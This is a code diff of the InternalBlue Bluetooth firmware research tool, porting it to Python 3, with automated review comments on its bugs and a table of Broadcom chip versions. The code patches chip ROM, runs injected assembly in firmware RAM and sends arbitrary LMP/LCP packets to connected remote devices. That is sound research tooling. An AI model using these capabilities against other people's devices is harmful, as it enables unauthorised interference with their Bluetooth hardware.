# type: (int, int, Optional[Any], int, int) -> Optional[bytes]
"""
Reads <length> bytes from the memory space of the firmware at the given
address. Reading from unmapped memory or certain memory-mapped-IO areas
@@ -743,11 +813,11 @@ class InternalBlue:
read_addr = address # read_addr is the address of the next Read_RAM HCI command
byte_counter = 0 # tracks the number of received bytes
outbuffer = '' # buffer which stores all accumulated data read from the chip
outbuffer = bytearray() # buffer which stores all accumulated data read from the chip
if bytes_total == 0: # If no total bytes where given just use length
bytes_total = length
retry = True # Retry once on failures
while(read_addr < address+length): # Send HCI Read_RAM commands until all data is received
bytes_total = length
retry = 3 # Retry on failures
while read_addr < address+length: # Send HCI Read_RAM commands until all data is received
# Send hci frame
bytes_left = length - byte_counter
blocksize = bytes_left
@@ -757,18 +827,28 @@ class InternalBlue:
# Send Read_RAM (0xfc4d) command
response = self.sendHciCommand(0xfc4d, p32(read_addr) + p8(blocksize))
if (response == None or response == False):
log.warning("readMem: No response to readRAM HCI command! (read_addr=%x, len=%x)" % (read_addr, length))
if response is None or not response:
log.warn("readMem: No response to readRAM HCI command! (read_addr=%x, len=%x)" % (read_addr, length))
# Retry once...
if retry:
if retry > 0:
log.debug("readMem: retrying once...")
retry = False
retry = retry - 1
continue
else:
log.warning("readMem: failed!")
return None
status = ord(response[3])
data = response[4:] # start of the actual data is at offset 4
if len(data) == 0: # this happens i.e. if not called on a brcm chip
log.warn("readMem: empty response, quitting...")
break
if len(data) != blocksize:
log.debug("readMem: insufficient bytes returned, retrying...")
continue
status = response[3]
if status != 0:
# It is not yet reverse engineered what this byte means. For almost
# all memory addresses it will be 0. But for some it will be different,
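Review bot: the new short-read path `if len(data) != blocksize: ... continue` re-issues the Read_RAM command without decrementing `retry`, so a chip that consistently returns fewer bytes than requested (or a truncated event) makes `readMem` spin forever; decrement `retry` there as well and fall through to the failure branch when it reaches 0. `response is None or not response` is redundant, `not response` already covers `None`. Moving the empty-response check ahead of the status check is a good change, since the old order logged a status error on a response that carried no data at all.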
@@ -776,24 +856,30 @@ class InternalBlue:
# 0x00 (0) means everything okay
# 0x12 means Command Disallowed
# e.g. for address 0xff000000 (aka 'EEPROM') it is 0x12
log.warning("readMem: [TODO] Got status != 0 : error 0x%02X" % status)
data = response[4:] # start of the actual data is at offset 4
outbuffer += data
if (len(data) == 0): #this happens i.e. if not called on a brcm chip
log.warn("readMem: empty response, quitting...")
log.warn("readMem: [TODO] Got status != 0 : error 0x%02X at address 0x%08x" % (status, read_addr))
break
# do double checking, but prevent loop
if self.doublecheck and retry > 0:
response_check = self.sendHciCommand(0xfc4d, p32(read_addr) + p8(blocksize))
if response != response_check:
log.debug("readMem: double checking response failed at 0x%x! retry..." % read_addr)
sleep(0.3)
retry = retry - 1
continue
outbuffer += data
read_addr += len(data)
byte_counter += len(data)
if(progress_log != None):
msg = "receiving data... %d / %d Bytes (%d%%)" % (bytes_done+byte_counter,
bytes_total, (bytes_done+byte_counter)*100/bytes_total)
msg = "receiving data... %d / %d Bytes (%d%%)" % (bytes_done+byte_counter,
bytes_total, old_div((bytes_done+byte_counter)*100,bytes_total))
progress_log.status(msg)
retry = True # this round worked, so we re-enable this flag
retry = 3 # this round worked, so we re-enable retries
return outbuffer
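Review bot: on `status != 0` the loop `break`s and the function still returns the partial `outbuffer` with no error signalled, so callers such as `getPatchramState` below slice a short buffer and compute garbage; return `None` here like the other failure paths, or at least warn that the returned buffer is truncated. The double-check block depends on `self.doublecheck`, which is not initialised in the `__init__` shown in this diff, so every core must set it; a default in the base class would be safer. `sleep(0.3)` comes from the pwntools star import; `time` is already imported, so `time.sleep(0.3)` is the explicit choice.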
def readMemAligned(self, address, length, progress_log=None, bytes_done=0, bytes_total=0):
# type: (int, int, Optional[Any], int, int) -> Any
"""
This is an alternative to readMem() which enforces a strictly aligned access
to the memory that is read. This is needed for e.g. the memory-mapped-IO
@@ -829,8 +915,9 @@ class InternalBlue:
log.warn("readMemAligned: address (0x%x) must be 4-byte aligned!" % address)
return None
recvQueue = Queue.Queue(1)
recvQueue = queue2k.Queue(1)
def hciFilterFunction(record):
# type: (Record) -> bool
hcipkt = record[0]
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return False
@@ -854,20 +941,24 @@ class InternalBlue:
blocksize = 244
# Customize the assembler snippet with the current read_addr and blocksize
code = asm(self.fw.READ_MEM_ALIGNED_ASM_SNIPPET % (blocksize, read_addr, blocksize/4), vma=self.fw.READ_MEM_ALIGNED_ASM_LOCATION, arch='thumb')
code = asm(self.fw.READ_MEM_ALIGNED_ASM_SNIPPET % (blocksize, read_addr, old_div(blocksize,4)), vma=self.fw.READ_MEM_ALIGNED_ASM_LOCATION, arch='thumb')
# Write snippet to the RAM (TODO: maybe backup and restore content of this area?)
self.writeMem(self.fw.READ_MEM_ALIGNED_ASM_LOCATION, code)
# Run snippet
if not self.launchRam(self.fw.READ_MEM_ALIGNED_ASM_LOCATION):
log.error("readMemAligned: launching assembler snippet failed!")
return None
# on iOSCore the return value might be wrong
if self.doublecheck:
log.debug("readMemAligned: probably failed, but continuing...")
else:
log.error("readMemAligned: launching assembler snippet failed!")
return None
# wait for the custom HCI event sent by the snippet:
try:
record = recvQueue.get(timeout=1)
except Queue.Empty:
except queue2k.Empty:
log.warn("readMemAligned: No response from assembler snippet.")
return None
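Review bot: `old_div(blocksize, 4)` (and the other `old_div` calls this series adds in `getPatchramState`, `patchRom`, `disableRomPatch` and the progress messages) is a futurize placeholder that preserves Python 2 `/` semantics; every operand involved is an `int` and integer division is what is meant, so write `blocksize // 4` and so on and drop the `past.utils` dependency. Continuing after a failed `launchRam` when `self.doublecheck` is set is reasonable for iOSCore, but `log.debug("readMemAligned: probably failed, but continuing...")` should be at warn level, since the data returned afterwards may be wrong.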
@@ -876,15 +967,16 @@ class InternalBlue:
outbuffer += data
read_addr += len(data)
byte_counter += len(data)
if(progress_log != None):
msg = "receiving data... %d / %d Bytes (%d%%)" % (bytes_done+byte_counter,
bytes_total, (bytes_done+byte_counter)*100/bytes_total)
if progress_log is not None:
msg = "receiving data... %d / %d Bytes (%d%%)" % (bytes_done+byte_counter,
bytes_total, old_div((bytes_done+byte_counter)*100,bytes_total))
progress_log.status(msg)
self.unregisterHciRecvQueue(recvQueue)
return outbuffer
def writeMem(self, address, data, progress_log=None, bytes_done=0, bytes_total=0):
# type: (int, bytes, Optional[Any], int, int) -> Optional[bool]
"""
Writes the <data> to the memory space of the firmware at the given
address.
@@ -897,7 +989,7 @@ class InternalBlue:
"""
log.debug("writeMem: writing to 0x%x" % address)
if not self.check_running():
return None
@@ -916,8 +1008,8 @@ class InternalBlue:
if(response == None):
log.warn("writeMem: Timeout while reading response, probably need to wait longer.")
return False
elif (response[3] != '\x00'):
log.warn("writeMem: Got error code %s in command complete event." % response[3].encode('hex'))
elif (response[3] != 0):
log.warn("writeMem: Got error code %s in command complete event." % bytes_to_hex(response[3]))
return False
write_addr += blocksize
byte_counter += blocksize
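Review bot: `bytes_to_hex(response[3])` is handed an `int` (the line above compares `response[3] != 0`, and indexing a `bytearray` yields ints), while the helper's name says it takes bytes; use `"0x%02x" % response[3]` as `launchRam` below does with `error_code`.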
@@ -927,31 +1019,33 @@ class InternalBlue:
return True
def launchRam(self, address):
# type: (int) -> bool
"""
Executes a function at the specified address in the context of the HCI
handler thread. The function has to comply with the calling convention.
As the function blocks the HCI handler thread, the chip will most likely
crash (or be resetted by Android) if the function takes too long.
"""
response = self.sendHciCommand(0xfc4e, p32(address))
if (response == None):
if response is None:
log.warn("Empty HCI response during launchRam, driver crashed due to invalid code or destination")
return False
if(response[3] != '\x00'):
log.warn("Got error code %x in command complete event." % response[3])
error_code = response[3]
if error_code != 0:
log.warn("Got error code %x in command complete event." % error_code)
return False
# Nexus 6P Bugfix
if ('LAUNCH_RAM_PAUSE' in dir(self.fw) and self.fw.LAUNCH_RAM_PAUSE):
if 'LAUNCH_RAM_PAUSE' in dir(self.fw) and self.fw.LAUNCH_RAM_PAUSE:
log.debug("launchRam: Bugfix, sleeping %ds" % self.fw.LAUNCH_RAM_PAUSE)
time.sleep(self.fw.LAUNCH_RAM_PAUSE)
return True
def getPatchramState(self):
# type: () -> Tuple[List[Optional[int]], List[Any], List[Any]]
"""
Retrieves the current state of the patchram unit. The return value
is a tuple containing 3 lists which are indexed by the slot number:
@@ -968,25 +1062,25 @@ class InternalBlue:
return False
slot_count = self.fw.PATCHRAM_NUMBER_OF_SLOTS
# On Nexus 5, ReadMemAligned is required, while Nexus 6P supports this memory area with ReadRAM
if self.fw.PATCHRAM_ALIGNED:
slot_dump = self.readMemAligned(self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS, slot_count/4)
slot_dump = self.readMemAligned(self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS, old_div(slot_count,4))
table_addr_dump = self.readMemAligned(self.fw.PATCHRAM_TARGET_TABLE_ADDRESS, slot_count*4)
else:
slot_dump = self.readMem(self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS, slot_count/4)
slot_dump = self.readMem(self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS, old_div(slot_count,4))
table_addr_dump = self.readMem(self.fw.PATCHRAM_TARGET_TABLE_ADDRESS, slot_count*4)
table_val_dump = self.readMem(self.fw.PATCHRAM_VALUE_TABLE_ADDRESS, slot_count*4)
table_addresses = []
table_values = []
slot_dwords = []
slot_bits = []
for dword in range(slot_count/32):
for dword in range(old_div(slot_count,32)):
slot_dwords.append(slot_dump[dword*32:(dword+1)*32])
for dword in slot_dwords:
slot_bits.extend(bits(dword[::-1])[::-1])
slot_bits.extend(bits(bytes(dword[::-1]))[::-1])
for i in range(slot_count):
if slot_bits[i]:
table_addresses.append(u32(table_addr_dump[i*4:i*4+4])<<2)
@@ -997,6 +1091,7 @@ class InternalBlue:
return (table_addresses, table_values, slot_bits)
def patchRom(self, address, patch, slot=None):
# type: (int, Any, Optional[Any]) -> bool
"""
Patch a 4-byte value (DWORD) inside the ROM section of the firmware
(0x0 - 0x8FFFF) using the patchram mechanism. There are 128 available
@@ -1021,7 +1116,7 @@ class InternalBlue:
if len(patch) != 4:
log.warn("patchRom: patch (%s) must be a 32-bit dword!" % patch)
return False
log.debug("patchRom: applying patch 0x%x to address 0x%x" % (u32(patch), address))
alignment = address % 4
@@ -1046,7 +1141,7 @@ class InternalBlue:
slot = i
log.info("patchRom: Reusing slot for address 0x%x: %d" % (address,slot))
# Write new value to patchram value table at 0xd0000
self.writeMem(0xd0000 + slot*4, patch)
self.writeMem(self.fw.PATCHRAM_VALUE_TABLE_ADDRESS + slot*4, patch)
return True
if slot == None:
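Review bot: replacing the hard-coded `0xd0000` with `self.fw.PATCHRAM_VALUE_TABLE_ADDRESS` is the right fix (the Nexus 5 constant does not hold for other firmwares), but the comment above it, `# Write new value to patchram value table at 0xd0000`, is now stale; reword it to refer to the firmware constant. The same applies to the `enable bitfield starts at 0x310204` comments in the two hunks below, which also write through `self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS`.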
@@ -1071,13 +1166,14 @@ class InternalBlue:
# Enable patchram slot (enable bitfield starts at 0x310204)
# (We need to enable the slot by setting a bit in a multi-dword bitfield)
target_dword = int(slot / 32)
target_dword = int(old_div(slot, 32))
table_slots[slot] = 1
slot_dword = unbits(table_slots[target_dword*32:(target_dword+1)*32][::-1])[::-1]
self.writeMem(self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS + target_dword*4, slot_dword)
return True
def disableRomPatch(self, address, slot=None):
# type: (int, Optional[int]) -> bool
"""
Disable a patchram slot (see also patchRom()). The slot can either be
specified by the target address (address that was patched) or by providing
@@ -1098,7 +1194,7 @@ class InternalBlue:
if address == None:
log.warn("disableRomPatch: address is None.")
return False
for i in range(128):
for i in range(self.fw.PATCHRAM_NUMBER_OF_SLOTS):
if table_addresses[i] == address:
slot = i
log.info("Slot for address 0x%x is: %d" % (address,slot))
@@ -1109,7 +1205,7 @@ class InternalBlue:
# Disable patchram slot (enable bitfield starts at 0x310204)
# (We need to disable the slot by clearing a bit in a multi-dword bitfield)
target_dword = int(slot / 32)
target_dword = int(old_div(slot, 32))
table_slots[slot] = 0
slot_dword = unbits(table_slots[target_dword*32:(target_dword+1)*32][::-1])[::-1]
self.writeMem(self.fw.PATCHRAM_ENABLED_BITMAP_ADDRESS + target_dword*4, slot_dword)
@@ -1120,6 +1216,7 @@ class InternalBlue:
return True
def readConnectionInformation(self, conn_number):
# type: (ConnectionNumber) -> Optional[ConnectionInformation]
"""
Reads and parses a connection struct based on the connection number.
Note: The connection number is different from the connection index!
@@ -1130,7 +1227,7 @@ class InternalBlue:
In the Nexus 5 firmware all connection numbers are simply the connection
index increased by 1.
The return value is a dictionary containing all information that could
The return value is a ConnectionInformation object containing all information that could
be parsed from the connection structure. If the connection struct at the
specified connection number is empty, the return value is None.
"""
@@ -1141,7 +1238,7 @@ class InternalBlue:
for const in ['CONNECTION_MAX', 'CONNECTION_ARRAY_ADDRESS', 'CONNECTION_STRUCT_LENGTH']:
if const not in dir(self.fw):
is_array = False
# Do we have a list implementation?
for const in ['CONNECTION_LIST_ADDRESS']:
if const not in dir(self.fw):
@@ -1165,26 +1262,13 @@ class InternalBlue:
if connection == b'\x00'*self.fw.CONNECTION_STRUCT_LENGTH:
return None
conn_dict = {}
conn_dict["connection_number"] = u32(connection[:4])
conn_dict["remote_address"] = connection[0x28:0x2E][::-1]
conn_dict["remote_name_address"] = u32(connection[0x4C:0x50])
conn_dict["master_of_connection"] = u32(connection[0x1C:0x20]) & 1<<15 == 0
conn_dict["connection_handle"] = u16(connection[0x64:0x66])
conn_dict["public_rand"] = connection[0x78:0x88]
#conn_dict["pin"] = connection[0x8C:0x92]
#conn_dict["bt_addr_for_key"] = connection[0x92:0x98][::-1]
effective_key_len = u8(connection[0xa7:0xa8])
conn_dict["effective_key_len"] = effective_key_len
conn_dict["link_key"] = connection[0x68:0x68+effective_key_len]
#new fields - TODO verify
conn_dict["tx_pwr_lvl_dBm"] = u8(connection[0x9c:0x9d]) - 127
conn_dict["extended_lmp_feat"] = connection[0x30:0x38] #standard p. 527
conn_dict["host_supported_feat"] = connection[0x38:0x40]
conn_dict["id"] = connection[0x0c:0x0d] #not sure if this is an id?
conn_dict = ConnectionInformation.from_connection_buffer(connection)
return conn_dict
def sendLmpPacket(self, opcode, payload='', is_master=True, conn_handle=0x0c, extended_op=False):
# type: (Opcode, Any, bool, ConnectionNumber, bool) -> bool
"""
Inject a LMP packet into a Bluetooth connection (i.e. send a LMP packet
to a remote device which is paired and connected with our local device).
@@ -1205,50 +1289,51 @@ class InternalBlue:
Returns True on success and False on failure.
"""
# Check the connection handle
# Range: 0x0000-0x0EFF (all other values reserved for future use)
if conn_handle < 0 or conn_handle > 0x0EFF:
log.warn("sendLmpPacket: connection handle out of bounds: %d" % conn_handle)
return False
# must be string...
if payload == None:
payload = ''
if ((not extended_op) and opcode > (0xff>>1)) or (extended_op and opcode > 0xff):
log.warn("sendLmpPacket: opcode out of range!")
return False
# Build the LMP packet
opcode_data = p8(opcode<<1 | (not is_master)) if not extended_op else p8(0x7F<<1 | (not is_master)) + p8(opcode)
# Nexus 5 (2012) simply takes any length as argument, but later withdraws bytes if too many were passed.
# Nexus 6P, Raspi 3+ and evaulation board (2014-2018) require a fixed 20 byte length parameter to be passed!
# -> 2 bytes connection handle, 1 byte length, which means 17 bytes for opcode and payload remaining
# sendlmp --data 11223344556677889900112233445566 01 -> actually works
# always pad to 17 data bytes...
data = opcode_data + payload + '\x00'*(17 - len(opcode_data) - len(payload))
if len(data) > 17:
log.warn("sendLmpPacket: Vendor specific HCI command only allows for 17 bytes LMP content.")
#log.info("packet: " + p16(conn_handle) + p8(len(data)) + data)
result = self.sendHciCommand(0xfc58, p16(conn_handle) + p8(len(payload + opcode_data)) + data)
if result == None:
log.warn("sendLmpPacket: did not get a result from firmware, maybe crashed internally?")
return False
result = u8(result[3])
if result != 0:
log.warn("sendLmpPacket: got error status 0x%02x" % result)
return False
return True
def fuzzLmp(self):
# type: ()-> bool
"""
Installs a patch inside the sendLmp HCI handler that allows sending arbitrary
LMP payloads. Afterwards, use sendLmpPacket as before.
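Review bot: the packet assembly in this hunk still mixes `str` and `bytes` under Python 3: `payload = ''` and `'\x00'*(17 - len(opcode_data) - len(payload))` are `str`, while `p8()` returns `bytes`, so `opcode_data + payload + ...` raises `TypeError` as soon as the conversion is active. Use `b''` and `b'\x00'*(...)` here and change the signature default to `payload=b''`. Smaller points in the same hunk: `if payload == None` should be `if payload is None`; when `len(data) > 17` the code only warns and then still sends the oversized command on the next line, so a `return False` after the warning would honour the docstring's 'False on failure' contract; and `u8(result[3])` indexes a single byte, which is already an `int` on Python 3 and is not accepted by `u8()`, so use `result[3]` directly or `u8(result[3:4])`.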
@@ -1276,6 +1361,7 @@ class InternalBlue:
return True
def sendLmpPacketLegacy(self, conn_nr, opcode, payload, extended_op=False):
# type: (int, Opcode, bytes, bool) -> bool
"""
Inject a LMP packet into a Bluetooth connection (i.e. send a LMP packet
to a remote device which is paired and connected with our local device).
@@ -1312,8 +1398,8 @@ class InternalBlue:
# Prepare the assembler snippet by injecting the connection number
# and appending the LMP packet data.
asm_code = self.fw.SENDLMP_ASM_CODE % (conn_nr)
asm_code_with_data = asm_code + ''.join([".byte 0x%02x\n" % ord(x)
asm_code = self.fw.SENDLMP_ASM_CODE % (conn_nr) # type: str
asm_code_with_data = asm_code + ''.join([".byte 0x%02x\n" % ord(x)
for x in data.ljust(20, "\x00")])
# Assemble the snippet and write it to SENDLMP_CODE_BASE_ADDRESS
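Review bot: `ord(x) for x in data.ljust(20, "\x00")` breaks for the `bytes` payload this function is now typed with: on Python 3 iterating `bytes` yields `int`, so `ord()` raises `TypeError`, and `bytes.ljust` rejects the `str` fill `"\x00"`. Suggest `".byte 0x%02x\n" % b for b in bytearray(data.ljust(20, b"\x00"))`, which yields ints on both Python 2 and 3.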
@@ -1327,7 +1413,45 @@ class InternalBlue:
log.warn("sendLmpPacket: launchRam failed!")
return False
def sendLcpPacket(self, conn_idx, payload):
# type: (ConnectionIndex, bytes) -> bool
"""
Inject a LCP packet into a Bluetooth LE connection (i.e. send a LCP packet
to a remote device which is paired and connected with our local device).
This is code requires assembly patches.
conn_idx: The connection index specifying the connection into which the
packet will be injected, starting at 0.
payload: The LCP opcode and payload of the LCP packet that will be injected.
Returns True on success and False on failure.
"""
# Check if constants are defined in fw.py
for const in ['SENDLCP_CODE_BASE_ADDRESS', 'SENDLCP_ASM_CODE']:
if const not in dir(self.fw):
log.warn("sendLcpPacket: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const)
return False
# Prepare the assembler snippet by injecting the connection number
# and appending the LMP packet data.
asm_code = self.fw.SENDLCP_ASM_CODE % (conn_idx, len(payload))
asm_code_with_data = asm_code + ''.join([".byte 0x%02x\n" % ord(x)
for x in payload.ljust(20, "\x00")])
# Assemble the snippet and write it to SENDLCP_CODE_BASE_ADDRESS
code = asm(asm_code_with_data, vma=self.fw.SENDLCP_CODE_BASE_ADDRESS, arch='thumb')
self.writeMem(self.fw.SENDLCP_CODE_BASE_ADDRESS, code)
# Invoke the snippet
if self.launchRam(self.fw.SENDLCP_CODE_BASE_ADDRESS):
return True
else:
log.warn("sendLcpPacket: launchRam failed!")
return False
def connectToRemoteDevice(self, bt_addr):
# type: (BluetoothAddress) -> None
"""
Send a HCI Connect Command to the firmware. This will setup
a connection (inserted into the connection structure) if the
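Review bot: `sendLcpPacket` has the same `ord(x)` / `payload.ljust(20, "\x00")` problem as the legacy LMP path: with `payload` typed `bytes` this raises under Python 3, so iterate `bytearray(payload.ljust(20, b"\x00"))` and format the ints directly. Documentation nits in the same hunk: 'This is code requires assembly patches.' should read 'This code requires assembly patches.', and the comment 'appending the LMP packet data' inside an LCP function should say LCP. The function also has no upper bound on `len(payload)`, unlike `sendLmpPacket`; since `SENDLCP_ASM_CODE` places the payload inline after the snippet at `SENDLCP_CODE_BASE_ADDRESS`, an oversized payload silently grows the code written into RAM, so a length check with a warning would be consistent with the LMP path.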
@@ -1355,6 +1479,7 @@ class InternalBlue:
self.sendHciCommand(0x0405, bt_addr[::-1] + '\x00\x00\x00\x00\x00\x00\x01')
def connectToRemoteLEDevice(self, bt_addr, addr_type=0x00):
# type: (BluetoothAddress, int) -> None
"""
Send a HCI LE Create Connection Command to the firmware as
defined in the Bluetooth Core Specification 5.0 p. 1266.
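Review bot: `self.sendHciCommand(0x0405, bt_addr[::-1] + '\x00\x00\x00\x00\x00\x00\x01')` in this hunk concatenates a `str` literal to `bt_addr`; with `bt_addr` as `bytes` (the `BluetoothAddress` type just added) this raises `TypeError` on Python 3. Make the literal `b'\x00\x00\x00\x00\x00\x00\x01'`.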
@@ -1371,6 +1496,7 @@ class InternalBlue:
self.sendHciCommand(0x200d, '\x60\x00\x30\x00\x00' + p8(addr_type) + bt_addr[::-1] + '\x01\x18\x00\x28\x00\x00\x00\xd0\x07\x00\x00\x00\x00')
def connectionStatusCallback(self, record):
# type: (Record) -> None
"""
HCI Callback function to detect HCI Events related to
Create Connection
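Review bot: same `str`/`bytes` mix in the LE path: `'\x60\x00\x30\x00\x00' + p8(addr_type) + bt_addr[::-1] + '\x01\x18\x00\x28\x00\x00\x00\xd0\x07\x00\x00\x00\x00'` adds `str` literals to the `bytes` returned by `p8()`, which fails under Python 3; prefix both literals with `b`. Consider building the parameter block from `p16`/`p8` with named values (scan interval and window, connection interval, supervision timeout) so the 0x200d parameters can be read against the spec page the docstring cites.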
@@ -1403,9 +1529,11 @@ class InternalBlue:
log.info("[Disconnect Complete: Handle=0x%x]" % (conn_handle))
def coexStatusCallback(self, record):
# type: (Record) -> None
"""
Coexistence Callback Function
Interprets debug counters for coexistence with WiFi/LTE
Call with "sendhcicmd 0xfc90"
"""
hcipkt = record[0] # get HCI Event packet
@@ -1419,10 +1547,14 @@ class InternalBlue:
if u16(hcipkt.data[1:3]) == 0xfc90: # Coex Statistics Cmd
coex_grant = u32(hcipkt.data[4:8])
coex_reject= u32(hcipkt.data[8:12])
log.info("[Coexistence Statistics: Grant=%d Reject=%d -> Reject Ratio %.4f]" % (coex_grant, coex_reject, coex_reject/float(coex_grant)))
ratio = 0
if coex_grant > 0:
ratio = coex_reject/float(coex_grant)
log.info("[Coexistence Statistics: Grant=%d Reject=%d -> Reject Ratio %.4f]" % (coex_grant, coex_reject, ratio))
return
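Review bot: good guard against `coex_grant == 0`. Initialise `ratio = 0.0` rather than `0` so the variable keeps one type (the `%.4f` format accepts an int, so this is style only), and the trailing bare `return` is redundant.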
def readHeapInformation(self):
# type: () -> Optional[Union[HeapInformation, bool]]
"""
Traverses the double-linked list of BLOC structs and returns them as a
list of dictionaries. The dicts have the following fields:
@@ -1516,6 +1648,7 @@ class InternalBlue:
def readQueueInformation(self):
# type: () -> Optional[List[QueueElement]]
"""
Traverses the double-linked list of QUEUE structs and returns them as a
list of dictionaries. The dicts have the following fields:
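Review bot: the new return type `Optional[List[QueueElement]]` contradicts the docstring directly below it, which still says the queues are returned 'as a list of dictionaries. The dicts have the following fields:'; update the docstring to describe `QueueElement` and its attributes. The `readHeapInformation` docstring above has the same wording and will need the same treatment if `HeapInformation` is a class.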
@@ -1541,7 +1674,7 @@ class InternalBlue:
for const in ['QUEUE_HEAD']:
if const not in dir(self.fw):
log.warn("readQueueInformation: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const)
return False
return None
# Read address of first queue struct:
first_queue_struct_address = u32(self.readMem(self.fw.QUEUE_HEAD, 4))
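Review bot: changing `return False` to `return None` matches the new `Optional[...]` annotation, but any caller that tests `result == False` or `result is False` now takes a different branch; check callers of `readQueueInformation` and switch them to `if result is None` (or `if not result`).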
@@ -1555,22 +1688,13 @@ class InternalBlue:
if queue_fields[0] != u32("UEUQ"):
log.warn("readQueueInformation: QUEUE double-linked list contains non-QUEU element. abort.")
return None
current_element = {}
current_element["index"] = index
current_element["address"] = current_queue_struct_address
current_element["item_size"] = queue_fields[2] * 4 # Item size is measured in dwords (4 Byte)
current_element["capacity"] = queue_fields[3]
current_element["available_items"] = queue_fields[4]
current_element["free_slots"] = queue_fields[5]
current_element["queue_buf_start"] = queue_fields[6]
current_element["queue_buf_end"] = queue_fields[7]
current_element["next_item"] = queue_fields[8]
current_element["next_free_slot"] = queue_fields[9]
current_element["thread_waitlist"] = queue_fields[10]
current_element["waitlist_length"] = queue_fields[11]
current_element["next"] = queue_fields[12]
current_element["prev"] = queue_fields[13]
current_element["name"] = self.fw.QUEUE_NAMES[index]
current_element = QueueElement(index, current_queue_struct_address, queue_fields[2] * 4,
queue_fields[3], queue_fields[4], queue_fields[5], queue_fields[6],
queue_fields[7], queue_fields[8], queue_fields[9], queue_fields[10],
queue_fields[11], queue_fields[12], queue_fields[13],
self.fw.QUEUE_NAMES[index])
queuelist.append(current_element)
current_queue_struct_address = current_element["next"]
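Review bot: `current_queue_struct_address = current_element["next"]` on the last line of this hunk still subscripts with a string key, but `current_element` is now a `QueueElement(...)` instance instead of a dict, so this raises `TypeError` on the first iteration unless `QueueElement` implements `__getitem__` for string keys; use the attribute (`current_element.next` or whatever it is named). Related: `u32("UEUQ")` passes a `str` to `u32`, which needs `b"UEUQ"` under Python 3, and the 14 positional arguments to `QueueElement` are easy to misorder, so keyword arguments (`item_size=queue_fields[2] * 4, capacity=queue_fields[3], ...`) would be safer.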
@@ -1579,6 +1703,7 @@ class InternalBlue:
return queuelist
def enableBroadcomDiagnosticLogging(self, enable):
# type: (bool) -> None
"""
Broadcom implemented their own H4 layer protocol. Normally H4 handles HCI
messages like HCI commands, SCO and ACL data, and HCI events. Their types are
@@ -1597,5 +1722,17 @@ class InternalBlue:
custom Bluetooth driver is required, which accepts diagnostic commands
and also forwards diagnostic message outputs to the BT Snoop Log.
"""
self.sendH4(hci.HCI.BCM_DIAG, '\xf0' + p8(enable))
if not self.serial:
self.sendH4(hci.HCI.BCM_DIAG, b'\xf0' + b'\x01' if enable else b'\x00')
# We can send the activation to the serial, but then the Android driver
# itself crashes when receiving diagnostic frames...
else:
log.warn("Diagnostic protocol requires modified Android driver!")
def _setupSockets(self):
raise NotImplementedError()
def _teardownSockets(self):
raise NotImplementedError()
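Review bot: operator precedence bug in `self.sendH4(hci.HCI.BCM_DIAG, b'\xf0' + b'\x01' if enable else b'\x00')`: the conditional expression binds looser than `+`, so this evaluates to `(b'\xf0' + b'\x01') if enable else b'\x00'`, and disabling sends a lone `\x00` byte without the `\xf0` prefix. Write `b'\xf0' + (b'\x01' if enable else b'\x00')`, or keep the shape of the removed line with `b'\xf0' + p8(int(enable))`.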
+36 -75
View File
@@ -9,49 +9,65 @@ Results are based on real world testing, this list is very incomplete. If you kn
Vendor | Version | SubVersion | Firmware | Devices | Firmware Build Date
-------| ------- | ---------- | ----------- | ------- | ----------
0x000f | 0x04 | 0x4217 | BCM4329B1 | iPhone 4
0x000f | 0x04 | 0x4217 | BCM4329B1 | iPhone 4, Nexus One, iPod touch (A1367)
0x000f | 0x04 | 0x21d0 | BCM2046 | iMac 27" late 2009
0x000f | 0x04 | 0x422a | BCM4331 | MacBook Pro early 2011
0x000f | 0x04 | 0x4203 | | HP ProBook 6550b and 6450b
0x000f | 0x05 | 0x4203 | BCM2034B | Thinkpad T420
0x000f | 0x05 | 0x610d | | iPad A1395
0x000f | 0x06 | 0x220e | BCM20702A1 | Asus USB Bluetooth dongle
0x000f | 0x05 | 0x240c | BCM20733 | Magic Keyboard
0x000f | 0x06 | 0x220e | BCM20702A1 | Asus USB Bluetooth dongle, HP Elitebook 820 G2
0x000f | 0x06 | 0x229b | BCM20702A3 | MacBook Pro 13" mid 2012 (A1278)
0x000f | 0x06 | 0x4103 | BCM4330B1 | iPhone 4s
0x000f | 0x06 | 0x4196 | BCM20702B0 | MacBook Pro mid 2014, iMac (Retina 5k, 27", ultimo 2014)
0x000f | 0x06 | 0x410d | | BlackBerry Q5
0x000f | 0x06 | 0x4196 | BCM20702B0 | MacBook Pro mid 2014, iMac (Retina 5k, 27", ultimo 2014), MacBook Air 2017 13"
0x000f | 0x06 | 0x6109 | | Samsung Galaxy Note 10.1 2014 WiFi (SM-P600)
0x000f | 0x07 | 0x220f | BCM20736S | Equiva Radiator Thermostat CC-RT-BLE-EQ
0x000f | 0x07 | 0x2203 | BCM43342 | iPhone 5s
0x000f | 0x07 | 0x2209 | BCM43430A1 | Raspberry Pi 3 | Jun 2 2014
0x000f | 0x07 | 0x230f | BCM4356A2 | Xperia Z5
0x000f | 0x07 | 0x410d | BCM4334 | iPhone 5 (A1429)
0x000f | 0x07 | 0x6109 | BCM4335C0 (BCM4339) | Nexus 5, Xperia Z3 Compact, Samsung Galaxy Note 3, LG G4 (LG-h815), Samsung Galaxy Note 10.1 2014 WiFi (SM-P600) | Dec 11 2012
0x000f | 0x08 | 0x6119 | BCM4345C0 | Raspberry Pi 3+, Honor 8 | Aug 19 2014
0x000f | 0x07 | 0x4606 | BCM4324 | iPad Air (A1474)
0x000f | 0x07 | 0x6109 | BCM4335C0 (BCM4339) | Nexus 5, Xperia Z3 Compact, Samsung Galaxy Note 3, LG G4 (LG-h815) | Dec 11 2012
0x0131 | 0x08 | 0x1200 | | Philips Sonicare (Cypress SoC CY8C4247LQI-BL483, not sure if compatible)
0x000f | 0x08 | 0x21a1 | | MacBook Pro Retina 13" early 2015
0x000f | 0x08 | 0x21a6 | BCM20703A1 | MacBook Pro early 2015
0x000f | 0x08 | 0x21a7 | BCM20703A1 | MacBook Pro early 2015 (with security fix)
0x000f | 0x08 | 0x21a8 | BCM20703A1 | MacBook Pro early 2015 (with security fix, 10.14.6)
0x000f | 0x08 | 0x220b | CYW20706 | CYW920706 Evaluation Kit, same ROM as MacBook Pro 2016 | Oct 22 2015
